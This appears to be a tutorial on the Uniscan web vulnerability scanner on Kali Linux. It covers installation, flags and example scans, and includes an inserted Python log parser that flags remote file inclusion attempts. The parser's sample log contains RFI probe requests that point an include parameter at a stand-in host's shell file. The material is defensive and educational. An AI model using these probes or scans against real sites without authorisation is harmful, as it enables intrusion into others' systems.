An RFI, or remote file inclusion attack, targets web applications that pull in external code at runtime: application plugins, hooks, themes, or anything else that is dynamically included into the web application while it runs.
If these includes contain vulnerabilities, it is highly likely that exploiting them leads to the main web application being exploitable as well.
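From the defender's side, the pattern an RFI probe leaves behind is a request whose include-style parameter carries a URL to a foreign host. The following is an added example (not Uniscan's code) that finds that pattern in Apache/nginx combined-format access logs; the log lines, IP addresses and the `own_hosts` allowlist are constructed for illustration.

```python
"""Flag remote-file-inclusion attempts in web server access logs (added example)."""
import re
from urllib.parse import urlsplit, parse_qsl

# Apache/nginx "combined" format: ip - - [time] "METHOD target HTTP/x" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# A parameter value using one of these schemes would make a vulnerable
# include() fetch code from another host.
REMOTE_SCHEMES = {"http", "https", "ftp", "ftps"}

# Constructed sample log: one normal include, two RFI probes (one URL-encoded),
# and one legitimate redirect parameter pointing at our own host.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "GET /index.php?page=http://203.0.113.99/shell.txt HTTP/1.1" 200 77 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:38 +0000] "GET /index.php?page=http%3A%2F%2F203.0.113.99%2Fshell.txt HTTP/1.1" 200 77 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /redirect?to=https://www.example.com/login HTTP/1.1" 302 0 "-" "curl/8.0"
"""


def find_rfi_attempts(log_text, own_hosts=()):
    """Return (client_ip, param_name, remote_host, status) for every request
    whose query parameter value is a URL on a host not listed in own_hosts."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        query = urlsplit(m["target"]).query
        # parse_qsl percent-decodes values, so encoded probes are caught too.
        for name, value in parse_qsl(query, keep_blank_values=True):
            parts = urlsplit(value)
            if parts.scheme.lower() in REMOTE_SCHEMES and parts.hostname \
                    and parts.hostname not in own_hosts:
                hits.append((m["ip"], name, parts.hostname, int(m["status"])))
    return hits


if __name__ == "__main__":
    for ip, param, host, status in find_rfi_attempts(SAMPLE_LOG, own_hosts=("www.example.com",)):
        print(f"{ip} sent parameter '{param}' pointing at {host} (HTTP {status})")
```

A 200 response to such a probe is what deserves triage first; a URL-valued parameter is not proof of a vulnerability, only of an attempt, so the allowlist keeps legitimate redirect or callback parameters out of the report.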
That’s why today we’ll take a look at the Uniscan project. In the project’s own words, Uniscan is a simple Remote File Include, Local File Include, and Remote Command Execution vulnerability scanner.
We recommend using Kali Linux for Uniscan as it is available for easy installation via the package manager.
Installing Uniscan on Kali Linux is straightforward, as it can be installed directly via the APT package manager and does not need to be compiled from source.
First, we update our APT package manager information with the following command:
Next, we proceed to install Uniscan:
apt install uniscan
To verify a successful Uniscan installation, let’s run the following command:
This should then return the following output, which displays the options/flags Uniscan has available:
Uniscan can run with minimal configuration as well, but it does allow for a good amount of customization:
- -h — The -h flag shows all the options available in Uniscan.
- -u — The -u flag specifies the URL to be scanned, for example: https://www.example.com/
- -f — If you wish to scan a list of URLs, put them in a text file and reference that file with the -f flag.
- -b — Scans can take a while to complete if you have multiple URLs to scan. The -b flag makes Uniscan run in the background; alternatively, you can run Uniscan inside a “screen” session on Linux.
- -q — The -q flag enables directory-based checks against the target being scanned.
- -w — The -w flag makes Uniscan check for files present on the remote host being scanned.
- -e — The -e flag makes Uniscan check for robots.txt and sitemap.xml, which can further help identify the type of script/web application running on the target host.
- -d — The -d flag enables dynamic checks, which look for dynamic file includes.
- -s — The -s flag enables static checks, which look for static file includes.
- -r — The -r flag enables stress checks against the target being scanned.
- -i and -o — These flags perform Bing and Google searches, respectively, for dorks related to the target being scanned.
- -g — The -g flag is used for web fingerprinting. This helps identify which web application is running on the web server, which plugins are enabled (for example, in WordPress), which version of WordPress is running on the server, and more.
- -j — The -j flag enables the server fingerprint check/listing, which allows identification of the server software. This performs actions such as ping, Nmap, traceroute, and listing of the web server and operating system in use.
Testing and results
To run a basic scan on a web app, we use the flags “qweds” which instruct Uniscan to perform the following:
- Directory checks (q)
- File checks (w)
- Robots/sitemap checks (e)
- Dynamic file include checks (d)
- Static file include checks (s)
The checks performed by the flags “qweds” can all be performed in the same run, with the command:
sudo uniscan -u https://target.webapp.url -qweds
Note: Replace https://target.webapp.url with the actual URL you wish to scan.
Which then returns to us the following output:
As seen above, when Directory and File checks are being performed, Uniscan will find and list directories as well as files seen on the target being scanned.
Next, Uniscan performs checks on robots.txt and the sitemap, then begins enumerating every external host linked from the target being scanned:
Uniscan also lists email addresses found on the web application being scanned, as shown in the following screenshot:
Then, Uniscan loads its plugins to perform the RFI (remote file inclusion) attack tests, XSS, SQL injection tests, and others:
Last but not least, the web application is checked for any web shells and the result is saved into a .html formatted report file:
Running a web fingerprinting scan
Running a web fingerprinting scan is another handy Uniscan feature. This option runs checks against the web application being scanned and tries to identify it, while also running other checks such as capturing error information, WHOIS information, language, and interesting strings.
To run a web fingerprinting scan, we use the -g and -u flags:
sudo uniscan -g -u scanme.nmap.org
Which then returns the following results:
Running a server fingerprinting scan
Similar to the web fingerprinting scan, the server fingerprinting scan is another key Uniscan feature, one that runs a series of tests such as ping, traceroute, Nmap, and Nslookup.
To run a server fingerprinting scan, we use the -j and -u flags:
sudo uniscan -j -u scanme.nmap.org
Which then returns the following ping and traceroute results:
Followed by the Nslookup results:
And, most importantly, the Nmap results of every port discovered and probed:
While this project has been unmaintained for many years, it is still shipped in the Kali Linux repository and remains a good addition to any security analysis toolkit. The tool also provides other key features, such as stress checks and generation of the scan results as an HTML-formatted report.
Furthermore, Uniscan offers key fingerprinting features: web fingerprinting checks that reveal which version of a web application is running and which plugins are enabled, and server fingerprinting that tells you more about the server itself through Nmap scans, traceroutes, and ping checks, and identifies the web server and operating system running on it.
Last but not least, with its simple, painless install procedure and availability via the APT package manager on Kali Linux itself, Uniscan integrates easily into one’s security toolset.